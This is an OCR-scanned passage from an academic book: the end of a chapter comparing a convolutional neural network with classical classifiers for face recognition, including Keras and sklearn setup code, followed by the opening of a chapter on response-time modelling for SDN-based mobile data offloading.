decide whether input provided by the perceptron is relevant or not. Some 
popularly used activation functions are: 


e ReLU - Stands for rectified linear units. It takes all real- 
valued inputs and replaces negative values with zero. F(x) = 
max(0,x) 

¢ Sigmoid - It takes real value input and squishes it to a range 
between 0 and 1. This function will pass 0 for very small 
negative values and 1 for large positive values, it is generally 
used at the last layer. 

¢ Softmax - It takes a vector of real value score and converts it 
into values between 0 and 1 whose sum is 1. 

e ‘Tanh - It takes real value input and convert its to the range 
[-1,1] 
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Neural Network learns by following three steps: 


¢ Forward Propagation - Before the first iteration all weights 
in the network are randomly assigned only then it moves 
from input to output layer. 

e Error Estimation — At the end of iteration at the output layer, 
error is calculated by checking the deviation/variation from 
original output. 

¢ Backward Propagation - After error estimation it passes on 
these values back through the network to calculate gradi- 
ents. Then all weights are adjusted/updated with the goal 
of reducing error at the output layer. This method is also 
known as Gradient Descent. 


11.3.2 Convolutional Neural Network (CNN) 


Since the mid-twentieth century, the early days of research in artificial 
intelligence, researchers and computer scientists have been trying to 
search for a way to get sense out of the visual data present in this world. 
Extracting, analyzing and learning patterns out of the visual data manu- 
ally is very tedious work and also time consuming. However, now things 
have changed rapidly decade by decade, researchers have made so much 
advancement in this field of work the above tasks have become less oner- 
ous, and large stacks of data become easily maintainable [5]. One of many 
such areas is computer vision. The main objective of the field of computer 
vision is to see the world as humans do. 

It is a known fact that neural networks are good at complex computa- 
tions and may seem to be perfect for such aims. But now consider an object 
detection task; this can also be achieved but a problem arises when the 
image is of high resolution, i.e., made of large pixels; then the number of 
parameters increases, making the neural network slow and computation- 
ally expensive. For instance, if one processes 32*32*3 image, then they'll 
get 3072 parameters but if they get high resolution with 1080*1080*3, then 
it has approximately 3 million parameters to process that too for a single 
iteration. For tasks like object detection, image recognition, etc., one won't 
use traditional neural networks but a specific type known as convolution 
neural network. 

Convolutional Neural Network (CNN) is a deep learning algorithm 
which takes input as image and does mapping on the important features 
by assigning different weights/biases to various aspects of the image and 
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hence is able to distinguish different images. Convolution neural networks 
process input images as tensors (matrix with additional dimensions) [7]. 
The image which humans see is different from what the computer sees. For 
example: a color image of size 720x720, its illustration will be 720x720x3 
(Channels = 3 (RGB)). Each pixel has a value from 0 to 255 which rep- 
resents pixel intensity at that point. Convolutional Neural Network com- 
prises two main components: 


e Feature Learning 
e Classification 


Feature Learning comprises a convolution layer and a pooling layer. It 
carries out the main part of the network’s computational load. In the con- 
volution layer the restricted part of the input image performs dot product 
with a filter/kernel (matrix of learnable parameters). Features extracted 
depend on the type of kernel used. Hence it is very important to choose 
the correct kernel depending upon the feature required [6]. These are a few 
types of common filters used in CNN: 


e Sharpen 

e Edge Detection 
e Blur 

e Masking 


If the image is grayscale then the filter will have small width and height 
but will have the same depth (h x wx 1) as that of the image. The resultant 
feature map will depend on three parameters: 


e Stride - number of pixels by which filter matrix is moved 
over input matrix. Larger stride results in smaller feature 
maps. Given that neighboring pixels are closely related, it 
makes sense to use stride and reduce output size. It is rec- 
ommended to use a smaller stride than a big stride as it can 
lead to high information loss. This happens when big strides 
are taken. It tends to take two pixels which are further away 
from each other and less correlated. 

e Padding - padding is how many extra pixels should be added 
to an image to maintain its dimensionality. 1 is mostly used 
for padding. 

e Depth - depth is the number of channels in image. 
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So, the convolution layer results in a feature map with lesser parameters 
and the same dimensionality. 

The pooling layer solely decreases computational power and prevents 
overfitting by reducing dimensionality of feature maps keeping crucial 
information. This layer extracts key features from a limited neighborhood. 
Pooling doesn't require any parameter. This layer only modifies height and 
width of feature map; depth remains unchanged as pooling works individ- 
ually on each depth slice. In common CNN architectures, pooling is per- 
formed with stride 2, 2x2 windows and no padding, whereas convolution 
is done with padding 3x3 windows, stride 1. Some popularly used pooling 
methods are: 


e Max - Maximum value is taken amongst all values lying in 
pooling region 

e Average - Average value of all values lying in pooling region 
is taken 

e Min - Minimum value is taken amongst all values lying in 
pooling region 

e Sum - Sum of all values in the pooling region is taken. 


At the end a matrix is created which has less dimensions and only the 
chief features of the image. 

After obtaining features, the input image is transformed into a suitable 
form for multi-level fully connected architecture, for classifying fully con- 
nected layers are used. A fully connected layer is a simple, feed-forward 
neural network. The output is flattened and fed to a fully connected layer 
then back-propagation is applied through iterations of training. Over a 
sequence of epochs, models can differentiate certain low-level attributes 
in images. Ultimately, an activation function like sigmoid or softmax is 
applied, classifying the output. Image recognition and classification are the 
chief fields of its application. Some other applications are facial recogni- 
tion and verification, and document digitization. Traditional CNN is not 
the go-to model for every image-related task. Some network architectures 
based on CNN are: 


e LeNet-5 

e AlexNet 

« VGG 16 

e Inception 
e ResNet 

e DenseNet 
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11.3.3 K-Nearest Neighbors (KNN) 


KNN is an algorithm inspired from real life. It is one of the simplest, most 
easily implemented supervised machine learning algorithm (one that 
learns from labelled data) which is used to find solutions to/for regression 
and classification problems [3]. As one’s surroundings shape their person- 
ality, likewise this algorithm presumes that similar things exist in close 
proximity due to their similar features/properties. The value of a data point 
is dependent upon the data points around it. It finds the distance between 
the given query and those data points. There are various methods to mea- 
sure distance: 


¢ Euclidean distance (default, most commonly used) 
e Manhattan distance 

e Minkowski distance 

e Cosine distance 

e Jaccard distance 


Subsequently, a certain number of examples (K) closest to the query are 
picked. Selecting an appropriate value of K is a crucial part of its imple- 
mentation; it is recommended to choose a value of K that’s neither too large 
nor too small. For instance, if someone takes K=1: the model will be too 
specific to a data instead of being generalized and will tend to be sensitive 
towards noise. The model may accomplish high accuracy on training data 
but will give unsatisfactory predictions on previously unseen data. On the 
other hand, if someone takes K=100: the model will become too general- 
ized and will result in inaccurate predictions on both train and test data. 
For choosing the right K, a trial and error method is generally used, i.e., 
trying several values of K and using one that works the best. Then the label 
of the query is selected with majority voting principle (in case of classifica- 
tion) or by averaging the labels (in case of regression) [8]. 

KNN’s main drawback is it becomes notably slow on increasing the 
volume of data or number of independent variables and has no ability to 
handle missing features of data, making it unsuitable to use in a practical 
environment (use cases) where classifications/predictions need to be made 
rapidly and accurately. However, KNN shows supremacy when it comes to: 


¢ Implementation 
e Small dataset 
e Constantly evolving dataset 
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e Where training is not required 
e Just one hyper-parameter given 


It is also known as a lazy learning algorithm as at the time of train- 
ing all it does is save the complete data on memory and does not perform 
any computations on that data until scoring, i.e. when someone applies a 
model on previously unseen points. So for training purposes runtime is as 
good as it gets and runtime of scoring can be exhaustive, varying linearly 
with the number of data points. Memory usage of KNN also grows linearly 
with the number of data points provided for training. The performance 
of this algorithm can be used as a threshold to define the accuracy that is 
acceptable, even in the worst case. 


11.3.4 Support Vector Machine (SVM) 


Support Vector Machine sounds intimidating but is based on a sim- 
ple idea of creating a line/hyperplane (n-dimensional subspace for an 
n-dimensional space) to separate the data into classes and maximizing 
the margin. Margin is the smallest (perpendicular) distance between data 
point and hyperplane. It is a supervised machine learning algorithm which 
is used to solve both classification and regression problems. At first approx- 
imation a basic hyperplane is created and with addition of new points it 
moves maximizing the margin. From [2], the study supports the hypothe- 
sis from this paper that the SVM approach is able to extract all the relevant 
information from the training data. Support Vectors are the data points 
closest to the hyperplane, and if removed would result in altered position 
of the hyperplane and may result in low accuracy. Core elements contrib- 
uting to SVM accuracy are: 


e Choice of Kernel (Mathematical function to manipulate 
data) 
e Proper Tuning of hyper-parameters. 


Choosing a kernel to utilize current features to apply some trans- 
formations, creating new features (transforming low dimension input 
space to high dimension) is known as a kernel trick. Radial Basis and 
Polynomial Function are the most popular ones used. Now in real-world 
scenarios finding a linearly separable dataset is nearly impossible. So 
there is some tolerance given to SVM called soft margin to handle mis- 
classifications as the bigger the tolerance is, the narrower the margin. 
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A combination of soft margin and kernel tricks are used to deal with 
real-life scenarios like text classification such as spam detection and cat- 
egory assignment, etc. 


11.3.5 Logistic Regression (LR) 


Logistic Regression is an elemental and popular algorithm used to solve 
classification problems. It is a supervised machine learning algorithm; it 
is named as Regression because its fundamental technique is similar to 
Linear Regression. Linear Regression assumes a linear relation between 
input independent variables and output dependent variables, and is 
highly sensitive to outliers in data resulting in poor outcomes/predictions. 
Logistic Regression uses a logistic function (sigmoid function, which 
gives output value between 0 and 1) to overcome this drawback. In logis- 
tic regression a probability threshold is determined; if the probability of 
an element is above the threshold then it is classified in one class or vice 
versa. 
There are three different categories of Logistic Regression: 


e Binary: Only two possible outcomes 
e Multinomial: three or more categories without ordering 
e Ordinal: three or more categories with ordering 


For determining binary classification, one tries to find the best fitted 
line first by Linear Regression; then the predicted value is fed into the 
sigmoid function for conversion to probability. Maximum likelihood esti- 
mation is used for calculation of cost function instead of mean squared 
error, as if this is used it will result in a non-convex function of param- 
eters with many local minima, making it laborious to find global mini- 
mum and minimize the cost value. By default this algorithm is limited 
to binary-class classification, but a popular workaround can be used for 
multi-class classification, i-e., by splitting the problem into multiple binary 
classification problems, another alternate approach involves changing the 
loss function to cross entropy loss and single output probability to one 
probability per class. One major drawback is it is difficult to obtain com- 
plex relationships as linearly dependent data is rarely found in real-world 
case scenarios, and can only be used to predict discrete sets. However, it is 
easy to implement, is efficient, accurate and fast at classifying previously 
unknown data. 
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11.3.6 Naive Bayes (NB) 


Naive Bayes is a user-oriented powerful supervised machine learning algo- 
rithm which uses a series of probabilistic classifier based on Bayes rule 
with simple assumptions: 


e ‘There is no correlation between features or predictors; i.e., 
they’re independent of each other. 

e The features contribute equally, ie., all carry the same 
weightage in classification; no feature is given more impor- 
tance than others. 


Naive Bayes is a generative model (a model which creates new data 
instances). It is generally used for General Classification and text analytics. 
It has many configurations, namely: 


¢ Multinomial Naive Bayes - Computes likelihood to be count 
of a random variable. 

e Complement Naive Bayes - Instead of computing probabil- 
ity of a random variable belonging to a particular class, it 
computes the probability of a random variable belonging to 
all classes. 

¢ Bernoulli Naive Bayes - Predicators/features are Boolean 
(binary) variables, the rest is similar to multinomial Naive 
Bayes. 

¢ Out-of-core Naive Bayes - This classifier handles large-scale 
classification for which complete dataset might not fit. 

e Gaussian Naive Bayes - This involves predictors (input data 
mapped to target variable) taking a continuous value like in 
Gaussian/Normal Distribution. 


Firstly, one calculates the probability of each class out of all classes which 
is known as its class prior probability; similarly, the probability of each 
predictor out of all predictors which is known predictor prior probability 
is computed. In the third step one calculates probability of likelihood, i.e., 
probability of predictor given class. Then in the final step posterior prob- 
ability, i.e., the probability of the class given predictor, is calculated. Now 
if a model has many features then it is possible that the resulting proba- 
bility may become zero because one of the attribute’s values is zero [9]. 
To solve this problem, someone can increase the value of the feature with 
zero to a small value so that the required probability doesn't come out as 
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zero. This correction is known as Laplace correction. Gaussian Naive Bayes 
shows dominance when it comes to predicting using a small dataset. It per- 
forms effectively on categorical input variables as compared to numerical 
variables. On the contrary, Bayes is considered a bad estimator sometimes, 
but despite the strong assumptions and cons, this performs extremely well 
in many cases and is a computationally inexpensive classifier. 


11.3.7. Decision Tree (DT) 


Decision trees are non-parametric supervised machine learning algorithms 

which are used for both regression and classification. Decision trees learn 

directly from the dataset with the help of if-else decision rules in order to 

estimate a sine curve. They consist of two elements: branches and nodes. 
Some chief terminologies associated to decision trees are: 


¢ Root Node: This node marks the start of the decision tree. 

e Decision Node: Where a sub-nodes splits into further nodes. 

e Terminal/Leaf Node: Last node of the tree, ie., predicted/ 
classified label. 

e Sub-Tree/Branch: Subdivision of the entire tree. 


Decision tree classifies the example by categorizing it down the tree to 
some terminal/leaf node, providing the classified label. Each and every 
node represents a test case for some feature, and each edge down from 
the node giving potential answers. Its accuracy is greatly determined by its 
ability to make tactical splits. A decision tree uses numerous algorithms to 
decide that split such as: 


e ID3: Iterative Dichotomiser 3 (Extension of D3) 

e (4.5: Successor of ID3 

e CART: Classification and Regression Tree 

e CHAID: Chi-square Automatic Interaction Detection 
e MARS: Multivariate Adaptive Regression Splines 


First of all, the root node attribute is chosen based on Attribute Selection 
Measure (ASM), i.e., if a dataset has N attributes then determining which 
attribute should be placed at the root/internal nodes. It’s not feasible to 
just select randomly, as it may result in poor results with low accuracy. So 
certain metrics are used such as Entropy or Gini Index for categorical and 
Mean Squared or Residual Error for regression, and different processes, 
depending on whether the evaluating feature is continuous or discrete. 
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For continuous attribute, average of two consecutive values is used as pos- 
sible thresholds; for discrete attribute, all possible values are evaluated, 
leading to N calculated metrics for each variable, resulting in N possible 
values for each categorical value. This process is repeated until stopping 
criteria is reached. Now this splitting leads to complex grown trees which 
are more likely to overfit the data, resulting in low accuracy on previously 
unseen data. A process called pruning is used to ensure good accuracy and 
prevent overfitting. It reduces the size of trees by turning some branches 
into leaf nodes, and discarding the leaf nodes under the primary branch, 
making the tree simpler by structure. A pruned tree has less sparsity than 
an unpruned tree. After a decision tree is built, predicting a value/label 
starts from the root of the tree, comparing the root feature with the record’s 
feature, and then following the branch corresponding to that value until 
the terminal/leaf node with predicted value is attained. When compared 
to other algorithms, this doesn’t require large datasets, normalization and 
scaling of data, and missing values does not affect the building of a decision 
tree; then again, a small change in data may cause great change in struc- 
ture of the tree, causing instability. As the complexity of decision rules is 
directly proportional to the depth of the tree, decision trees need a good 
amount of time to train the model as sometimes calculations go far more 
complex than other algorithms. 


11.4 Experimental Methodology 


11.4.1 Dataset 


For this experiment a custom dataset was made and used. The dataset con- 
sisted of six folders representing six different people having 45 images of 
each individual. Images in these folders are of different sizes and are hand- 
picked such that only the front view of the face is taken. All the images are 
in RGB format. 


11.4.2 Convolutional Neural Network (CNN) 


e Preprocessing 

As the dataset is small and collected images are of different sizes, it is not 
suitable for direct input in a neural network. Therefore, they are prepro- 
cessed according to needs. 
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The following steps are taken for preprocessing: 


1. All the images are first loaded and each image is reshaped 
into dimensions of 64*64. 

2. After this, integer labels starting from 0 to 5 are given to 
string labels of images. And data of each folder is shuffled 
and divided into training and testing dataset randomly in a 
ratio of 7:3. 

3. Then the new dataset is augmented using the 
ImageDataGenerator class of Keras. Data is augmented in 
order to improve the model's performance and increase its 
accuracy by increasing the ability to generalize. It artifi- 
cially creates new instances of data from an existing dataset 
by using transforms such as zoom, flip, shift, etc. By aug- 
menting the dataset, it introduces variations of images to the 
model. The following parameters were given: 

e class_mode = categorical, ie., 2D array of one-hot 
encoded labels. 
e batch_size = 2 
e target_size = (64,64) 
e zoom_range = 0.2, i.e., random zoom range 
¢ horizontal_flip = True. 
4. Lastly, the preprocessed dataset is fed to the neural network. 


e Convolutional Neural Network for Image Processing 

1. To make this architecture, the sequential model API of the 
Keras library is used. 

2. Three convolutional 2D layers are made with 64, 128, 64 fil- 
ters, respectively. After preprocessing, the input size of each 
image is [64, 64, 3] dimensionally. The Foremost Conv 2D 
layer comprises 64 filters with [5,5] as dimensions of each 
filter and uses ReLu as activation function. This layer gives 
output of dimensions [60, 60, 64]. (Due to 64 filters being 
used third dimension changes to 64, ie., adds 64 channels 
to image.) After this a MaxPool2D layer of dimension [2,2] 
is added to provide an abstract form (avoiding overfitting) 
and reduce dimensions of output of the first layer. The resul- 
tant dimensions are [30,30,64]. This is passed as input to the 
third layer which is again a Conv2D layer of 128 filters hav- 
ing [5,5] as dimensions, again using ReLu as activation func- 
tion. This layer gives output of [26,26,128] dimensions. Now 
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again the MaxPool layer is added of dimensions [2,2] giving 
output with dimensions [13,13,128]. This is used as input 
for the last Conv2D layer having 64 filters of [5,5] dimen- 
sions and activation function ReLu, giving [9,9,64] as output 
dimensions. Another MaxPool2D layer of [2,2] dimensions 
is added. This layer gives output of [4,4,64] dimensions. The 
neural network architecture and summary can be seen in 
Figures 11.1 and 11.2 respectively below. 

3. Now a Flatten layer is added to flatten output to pass it to 
Dense layers for prediction. After flatten output dimension 


model = Sequential() 

model.add(Convolution2D(64, kernel_size=(5, 5), strides=(1, 1), imput_shape=(64,64,3), activation='relu')) 
model. add(MaxPool2D(pool_size=(2,2))) 

model.add(Convolution2D(128, kernel_size=(5, 5), strides=(1, 1), activation='relu')) 
model. add(MaxPoo12D(pool_size=(2,2))) 

model.add(Convolution2D(64, kernel_size=(5, 5), strides=(1, 1), activation='relu')) 
model. add(MaxPool2D(pool_size=(2,2))) 

model.add(Flatten()) 

model.add(Dense(256, activation='relu')) 

model.add(Dense(128, activation='relu')) 

model.add(Dense(6, activation='softmax')) 


Figure 11.1 Architecture of convolutional neural network. 


Model: "sequential_1" 


Layer (type) Output Shape Param # 
conv2d_3 (Conv2D) —~—~=«(None, 60, 60, 64) 864 
max_pooling2d_ 3 (MaxPooling2 (None, 30, 30, 64) 0 
conv2d_4 (Conv2D) ~~ (None, 26, 26, 128) | 204928 ~~ 
max_pooling2d_4 (MaxPooling2 (None, 13, 13, 128) 0 
conv2d_5 (Conv2D) (None, 9, 9, 64) 204864 
max _pooling2d_5 (MaxPooling2 (None, 4, 4, 64) 0 
flatten_1 (Flatten) (None, 1024) 0 

dense 3 (Dense) ~~ (None, 256) = ~~ 262400—™”™ 
dense 4 (Dense) (None, 128) 32896 
dense_5 (Dense) +~=~(None, 6) ————<“C—s~s=‘:™C«*z2TSACSCS*~*~™” 


Total params: 710,726 
Trainable params: 710,726 
Non-trainable params: 0 


Figure 11.2 Summary of convolutional neural network. 
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model.compile(loss='categorical_crossentropy', optimizer = ‘adam', metrics=["accuracy"]) 
Figure 11.3 Compilation of convolutional neural network. 


is 1024. Towards the end of the network there are 2 dense 
and hidden layers of 256 and 128 neurons, and lastly a 6 neu- 
ron softmax layer to calculate probabilities. 

4. The model is compiled using accuracy as metrics, Adam 
optimizer and categorical cross entropy because of multi- 
class classification. The model can be compiled using the 
program shown in Figure 11.3. 

5. For predictions: Saved model of “h5” format is loaded and 
the “predict” function is called, taking new images as input 
arguments and making predictions based on them. It gives 
output as “O” for first individual, “1” for second individual 
and so on up to 6 individuals. 


11.4.3 Other Machine Learning Techniques 


e Preprocessing 
The number of images collected (dataset) are not suitable to be given to any 
machine learning technique hence some preprocessing is required. 

For preprocessing the following steps are taken: 


1. All the images are first loaded using the OpenCV module 
but it loads images in BGR color channel rather than RGB 
which is required. So in order to obtain an RGB channel, 
order is reversed. 

2. Next every image is aligned in the dataset to a particular 
dimension so that each image is of the exact same dimension 
from all sides. In this step, other aligned module parameters 
such as ‘getLargestFaceBoundingBox(), ‘landmarkIndices’ 
are also used. 

3. Now the image is embedded into a vector of zeros, in this 
image is converted from RGB (255 channels) to an interval 
between [0,1]. So that the resultant vectorize image contains 
each pixel with a value of 0,1. 

4. Now it is necessary to encode the labels for each image. In 
order to do that a LABEL ENCODER is initialized, which is 
fitted with the labels from the dataset. At last, the encoder 
is transformed to a numerical value matrix so that it can be 
used with a vectorized form of images. 
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5. One final step is taken, to split the images as well as the labels 
into training and testing data. It is important to shuffle data 
before splitting. 


e K-Nearest Neighbor (KNN) 


1. First step is to import the “KNeighborsClassifier” from the 
neighbors model api of the sklearn library. 

2. This KNeighborsClassifier is used to classify images which is 
primarily based on the K nearest neighbors (KNN) machine 
learning technique. 

3. The classifier has different types of hyperparameters all of 
which have default values but values can be set on according 
to requirement. 

4. In this classifier two hyperparameter are changed: 

1) n_neighbors = 2 (default : 5) 
2) metric = ‘euclideam (default : Minkowski’) 

5. KNN classifier can be initiated as shown in Figure 11.4. Now 
training data is fitted into the classifier. 

6. At last the “predict” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


e Support Vector Machine (SVM) 


1. First step is to import the “LinearSVC” from the svm model 
api of the sklearn library. 

2. This LinearSVC classifier is used to classify images which 
is primarily based on the Support vector machine (SVM) 
machine learning technique. 

3. The classifier has different types of hyperparameters, all of 
which have default values but values can be set on according 
to requirement. 


knn = KNeighborsClassifier(n_neighbors=2, metric='euclidean') 


Figure 11.4 Summary and Hyperparameters of K-Nearest Neighbor classifier. 


Lsvc = LinearSVC(penalty = '12' ,loss = 'squared_hinge' ,max_iter =1000) 


Figure 11.5 Summary and Hyperparameters of support vector machine classifier. 
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4, In this classifier three hyperparameter are changed: 
1) Penalty = ‘12’ 
2) Loss = ‘squared_hinge’ 
3) max_iter = 1000 

5. SVM classifier can be initiated as shown in Figure 11.5. Now 
training data is fitted into the classifier. 

6. At last the “predict” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


e Naive Bayes (NB) 


1. First step is to import the “GaussianNB” from the Naive 
Bayes model api of the sklearn library. 

2. This GaussianNB classifier is used to classify images which 
is primarily based on the Naive Bayes machine learning 
technique. 

3. The classifier has different types of hyperparameters all of 
which have default values but values can be set on according 
to requirement. 

4. In this classifier all default hyperparameters are used. 

5. Gaussian Naive Bayes classifier can be initiated as shown in 
Figure 11.6. Now training data is fit into the classifier. 

6. At last the “predict” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


e Logistic Regression (LR) 


1. First step is to import the “LogisticRegression” from the lin- 
ear model api of the sklearn library. 

2. This Logistic Regression classifier is used to classify images 
which is primarily based on the Logistic Regression machine 
learning technique. 

3. The classifier has different types of hyperparameters, all of 
which have default values but values can be set on according 
to requirement. 

4. In this classifier one hyperparameter is changed: 

1) multi_class = ‘multinomial’ (default : ‘auto’) 


gnb = GaussianNB() 


Figure 11.6 Summary and hyperparameters of Naive Bayes classifier. 
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lr = LogisticRegression(multi_class='multinomial' ) 


Figure 11.7 Summary and hyperparameters of Logistic Regression classifier. 


dt = tree.DecisionTreeClassifier(spitter = 'best' ,criterion = 'gini') 


Figure 11.8 Summary and hyperparameters of Decision Tree classifier. 


5. Logistic regression classifier can be initiated as shown in 
Figure 11.7. Now training data is fitted into the classifier. 

6. At last the “predict ” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


¢ Decision Tree (DT) 


1. First step is to import the “DecisionTreeClassifier” from the 
tree model api of the sklearn library. 

2. This DecisionTreeClassifier is used to classify images which 
is primarily based on the Decision Tree machine learning 
technique. 

3. The classifier has different types of hyperparameters all of 
which have default values but values can be set on according 
to requirement. 

4. In this classifier two hyperparameter are changed according 
to requirement 
1) spitter = “best” 

2) criterion = “gini” 

5. Decision tree classifier can be initiated as shown in Figure 
11.8. Now training data is fitted into the classifier. 

6. At last the “predict ” function is used to classify the images 
and with the help of “accuracy score” the accuracy of the 
classifier is generated. 


11.5 Results 


All the classifiers and Convolutional neural network were fitted on the 
training dataset of images. Training of CNN took a few hours but was able 
to make precise predictions on input images. It was observed that for a 
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small dataset CNN didn’t perform up to the mark; on the other hand, tra- 
ditional machine learning algorithms unexpectedly performed well on a 
small dataset with accuracy ranging from 92% to 97%. If the dataset is 
skewed (increase number of images belonging to a particular class) it was 
observed that traditional machine learning algorithms showed highly 
biased results towards a particular class as compared to convolutional neu- 
ral networks. Traditional machine learning algorithms and convolutional 
neural networks show poor results when the input face image provided is 
not front facing but this restriction will be revoked if convolutional neu- 
ral network is trained on few images facing other sides. The graph shown 
below in Figure 11.9, shows the accuracy percentage for each algorithm. 
Percentage is computed by comparing the number of correctly identified 
images and total number of tested images. 
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Figure 11.9 Accuracy comparison between convolutional neural network (CNN) and 
other machine learning techniques. 
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11.6 Conclusion 


Face recognition is one of the most challenging problems in the vast field of 
computer vision. It has received a lot of attention over the last few decades 
because of its applications in various sectors [11]. In order to do this a vast 
amount of research has been conducted over the past few decades, and a 
lot of progress has been made in this field and results have been encour- 
aging for all the researchers. But a perfect face recognition system that is 
able to perform adequately under all circumstances and conditions that are 
applied is still a long way away. 


“The human face is a dynamic object and has a high degree of vari- 
ability in its appearance, which makes face detection a difficult 
problem in computer vision.” 


“Face detection: A survey” [10]. 


This paper presents an empirical comparison of the different machine 
learning and deep learning techniques, based on face recognition systems. 
The results are all satisfactory and promising and they clearly show that 
CNN (Convolutional neural network) performed better than any other 
machine learning techniques. But these are only a small set of techniques 
used while there are many techniques out there which need some research 
and can perform even better. This gives a future scope in which more 
prominent and promising techniques can be developed by improving and 
advancing. There is a need for more advanced research for every meth- 
odology so that they can be made for development in various sectors to 
meet public need. Security and surveillance are the sectors which are most 
impacted by face recognition systems. Nowadays, there is talk of imple- 
menting these face recognition systems in the banking sector (for security, 
fraud detection, etc.) but still there are some areas where these advanced 
technologies can be exploited by intruders, hackers, etc., so there is scope 
for a lot of studies, researches, infrastructure improvement, etc. 
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Abstract 

The approach of data traffic offloading methodologies is likely to improve the 
quality of mobile service to address the issue of insufficient bandwidth due to 
the rapid growth of cellular data traffic. To measure the real-time performance 
of Software-defined networking (SDN) based offloading systems, computing 
the response time is essential to consider. In this study, we develop a compu- 
tation model to estimate the response time of the SDN-based data traffic off- 
loading system (SDN-TOS) to predict the efficiency of system performances 
accurately. The values related to the process of Mininet emulator were collected 
from a mobile communication company through a third-party broker based in 
Sri Lanka. Further analysis is considered to perform the comparison between 
the proposed model and the Cloud Service Providers (CSP) approach. The CSP 
approach considers only one network to estimate the response time; in contrast, 
our model perceives the response time of the SDN controller and both Long- 
Term Evolution (LTE), and Wi-Fi in the offloading process. Hence, our com- 
putation model generates high accurate value for the required response time of 
SDN-TOS. The essential parameters that directly affect the offloading task such 
as computation capability and uplink data rate are observed through the com- 
parison between two different service providers. The computation capability and 
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uplink data rate of data traffic offloading processes are involved in a significant 
role in real-time decision making for data and mobile communication services. 
Our analysis exhibits the effectiveness of a comprehensive computation model 
and identifies the most appropriate parameters to enhance the performance of 
SDN-TOS in the mobile and data communication industries. 


Keywords: Software-defined networking (SDN), data traffic offloading system, 
multipath transmission, Mininet Wi-Fi emulator, TOS, wireless communication, 
mobile networks, mobile data offloading 


12.1 Introduction 


Due to the rapid growth and enhancements of technology in the era of 
Industry 4.0, the fourth industrial revolution [1], organizations are imple- 
menting strategies for digital transformation to leverage the quality of 
their products and services. Not only organizations, but also individuals 
are embracing this digital transformation. This includes technologies such 
as artificial intelligence, fifth-generation wireless technologies, self-driving 
vehicles, Internet of Things (oT), and robotics. 

Especially, industries such as healthcare [2-6] manufacturing [7-10], 
autonomous vehicles [11-14], and farming [15-18], are heavily investing 
to move towards automating their products and processes to improve qual- 
ity and efficiency. Research carried out on a fall detection system using a 
smartphone [19] shows how a Software-Defined Networks (SDN) based 
system can be used in healthcare. It also discusses the importance of per- 
formance in such a system. One of the studies on indoor farming [15] 
shows how farming can be improved with assisted robots and a real-time 
monitoring mobile application by reducing the cost and carbon dioxide 
emission. Another paper [16] discusses how Software-Defined Networks 
(SDN) and Network Function Virtualization (NFV) can help to lower the 
costs of smart farming. Automobile is another industry that transforms 
with 5G and edge devices [20-22], introducing features such as automated 
driving. Furthermore, an article on how the construction industry trans- 
forms with digitization [23] explains how real-time monitoring systems 
can help them to react quickly in high-risk environments to create a more 
secure worksite showing the importance of estimating the response time 
of their systems. Therefore, it is proved that along with this transformation, 
the number of smart device users has considerably increased globally, con- 
tributing to the growth of data traffic volume. It proves that mobile service 
providers show an increased interest in solving the problem of insufficient 
bandwidth of cellular networks. 
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Several studies have been carried out to evaluate the performance of 
SDN [24-26]. Also, several studies [27-31] have produced solutions for 
data traffic offloading systems. Besides, there is still a lack of methods for 
computing the response time of the data traffic offloading process to esti- 
mate the efficiency of the data traffic offloading systems. A research on 
“modeling and evaluation of software defined networking based 5G core 
network architecture” [32] suggests that performance evaluation of data 
traffic offloading including the load balancing is necessary. It is an inher- 
ently challenging task to predict the time taken to complete the data traf- 
fic offloading process, which has led to real-time decision making in the 
mobile communication industry. 

To acquire the sufficient bandwidth demand in a cellular network, an 
innovative cellular network should be created using a fast wireless com- 
munication channel with less transmission latency. The heterogeneous 
network infrastructure supports the high capacity of network bandwidth 
which effectively offload the network data traffic. To integrate Wi-Fi into 
the Long-Term Evolution (LTE) network, the 3GPP (Third Generation 
Partnership Project) standard is defined as the Access Network Discovery 
and Selection Function (ANDSF) [33-35]. ANDSF supports the develop- 
ment of a precise framework for data traffic offloading that provides infor- 
mation to mobile devices on an alternative wireless network. 

The present work intends to develop a comprehensive computation 
model which produces more practical benefits to analyze the real-time 
performances of the Software-defined networking (SDN) based data traffic 
offloading process. The simulation results investigate the accuracy of the 
SDN-TOS computation model with the comparison between our model 
and Cloud Service Providers (CSP) approach [36] computation model that 
does not consider some crucial tasks of the data traffic offloading process. 
Further, another simulation result also provides the guidelines for imple- 
menting faster service by minimizing the time consumption of data traffic 
offloading in mobile and data communication. This work, therefore, pres- 
ents a scheme that identifies the potential importance of efficiency and 
effectiveness of the SDN-based data traffic offloading process to maximize 
the service quality for data and mobile communication users worldwide. 


12.1.1 Motivation 


Most studies in Software-defined networking (SDN) based data traffic off- 
loading systems have only been carrying out the theoretical framework 
and system feature considerations of the data traffic offloading method. 
This study seeks to address the significant drawbacks of previous works 
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Table 12.1 A comparison among previous studies and the components used by those studies to estimate the computation time of 


SDN-TOS. 
System Technology System design Observes user Interested 
components consideration components satisfaction on groups 


controller with 
sub-controllers 
configuration 
computerization 
of data traffic 
offloading 


configuration 
system(s) 


< | Open flow 
switches 
Load balancing 
<\ | Network status 
monitoring 
< | Bandwidth 
Response time 
< | Throughput (bits/ 
providers 


Duet al. (2019) [28] 


<< | Mobile users 


<< | Optimal path 
* 


* 
*® 


Zhao et al. (2019) [27] 
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Cui et al. (2018) [33] 
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Chen et al. (2018) [37] 


ao] 
cs) 
=| 
e 
o 
ao] 
é 

i-} 
nN 
v 
v 
v 
v 
v 


SN S\N SX | Cellular network 


s 
* 
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(Continued) 
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Table 12.1 A comparison among previous studies and the components used by those studies to estimate the computation time of 
SDN-TOS. (Continued) 


System Technology System Design Observes User Interested 
components consideration components satisfaction on groups 


controller with 
sub-controllers 
configuration 
computerization 
of data traffic 
offloading 


configuration 
system(s) 


Load balancing 
monitoring 

Bandwidth 

Throughput (bits/ 
providers 


< | Software-defined 
switches 
Optimal path 


< | Multipath 

< | Centralized SDN 
< | Network status 

< | Response time 

< | Cellular network 
< | Mobile users 


Krishna et al. 
2018) [34] 


Feng et al. (2016) 
38] 


x 
S 
< 
~ 


Orimolade et al. 
2015) [35] 


Alvizu et al. (2014) 
39] 


Arslan et al. (2014) 
29] 


Triantafyllopoulou 
et al. (2012) [36] 
